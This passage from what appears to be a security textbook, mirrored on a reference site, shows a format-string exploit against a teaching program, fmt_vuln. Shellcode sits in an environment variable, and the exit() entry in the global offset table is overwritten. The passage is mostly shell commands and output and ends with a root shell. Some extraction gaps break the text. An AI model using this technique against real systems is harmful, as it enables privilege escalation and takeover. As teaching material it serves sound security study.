Graphics Programs Reference
In-Depth Information
once again for clarity. In the output below, the address of the shellcode (
)
is written into the address of the
exit()
function (
).
reader@hacking:~/booksrc $ export SHELLCODE=$(cat shellcode.bin)
reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./fmt_vuln
SHELLCODE will be at
0xbffff9ec
reader@hacking:~/booksrc $ gdb -q
(gdb) p 0xbfff - 8
$1 = 49143
(gdb) p 0xf9ec - 0xbfff
$2 = 14829
(gdb) quit
reader@hacking:~/booksrc $ objdump -R ./fmt_vuln
./fmt_vuln: file format elf32-i386
DYNAMIC RELOCATION RECORDS
OFFSET TYPE VALUE
08049764 R_386_GLOB_DAT __gmon_start__
08049774 R_386_JUMP_SLOT __gmon_start__
08049778 R_386_JUMP_SLOT __libc_start_main
0804977c R_386_JUMP_SLOT strcpy
08049780 R_386_JUMP_SLOT printf
08049784 R_386_JUMP_SLOT exit
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x86\x97\x04\x08\x84\x97\x04\
x08")%49143x%4\$hn%14829x%5\$hn
The right way to print user-controlled input:
????%49143x%4$hn%14829x%5$hn
The wrong way to print user-controlled input:
????
b7fe75fc
[*] test_val @ 0x08049794 = -72 0xffffffb8
sh-3.2# whoami
root
s
h-3.2#
When fmt_vuln.c tries to call the
exit()
function, the address of the
exit()
function is looked up in the GOT and is jumped to via the PLT. Since
the actual address has been switched with the address for the shellcode in the
environment, a root shell is spawned.
Another advantage of overwriting the GOT is that the GOT entries are
fixed per binary, so a different system with the same binary will have the same
GOT entry at the same address.
The ability to overwrite any arbitrary address opens up many possibilities
for exploitation. Basically, any section of memory that is writable and contains
an address that directs the flow of program execution can be targeted.
